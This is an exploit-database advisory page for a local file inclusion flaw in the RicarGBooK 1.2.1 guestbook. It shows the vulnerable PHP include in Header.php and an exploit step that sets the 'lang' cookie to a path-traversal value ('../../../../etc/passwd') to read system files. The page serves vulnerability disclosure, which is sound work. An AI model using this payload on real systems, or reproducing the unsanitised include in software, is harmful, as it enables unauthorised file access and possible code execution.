header-logo
Suggest Exploit
vendor:
RicarGBooK
by:
Dj7xpl
N/A
CVSS
HIGH
Local File Inclusion
CWE
Product Name: RicarGBooK
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

RicarGBooK 1.2.1

The vulnerability exists in the 'Header.php' file of RicarGBooK 1.2.1. It allows an attacker to include arbitrary files from the server by manipulating the 'lang' cookie parameter. This can lead to unauthorized access to sensitive files or remote code execution.

Mitigation:

The vendor should release a patch that validates and sanitizes user input for the 'lang' cookie parameter. Users should update to the latest version of RicarGBooK to mitigate this vulnerability.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                       RicarGBooK 1.2.1 

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :

            Dj7xpl / Dj7xpl[at]Yahoo[dot]com

* Type :

            Local File Inclusion Vulnerabilitiy By Cookie

* Download :

            http://ricargbook.adrielmedia.com

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code :       -=-= Header.php =-=-


if (isset($HTTP_COOKIE_VARS["lang"])) {
	$guest_lang = $HTTP_COOKIE_VARS["lang"];
	include ('languages/'.$guest_lang);
} else {
	$guest_lang = $language;
	include ('languages/'.$language);

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln And Example Picture :

            Edit Cookie :

            Server :  http://[Target]			
	    Name   :  lang
	    Value  :  Local File      E.g   :  ../../../../etc/passwd
			
			
	    [X] http://dj7xpl.by.ru/r1.jpg
	    [X] http://dj7xpl.by.ru/r2.jpg
			
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

# Sp Tnx : str0ke

# milw0rm.com [2007-04-12]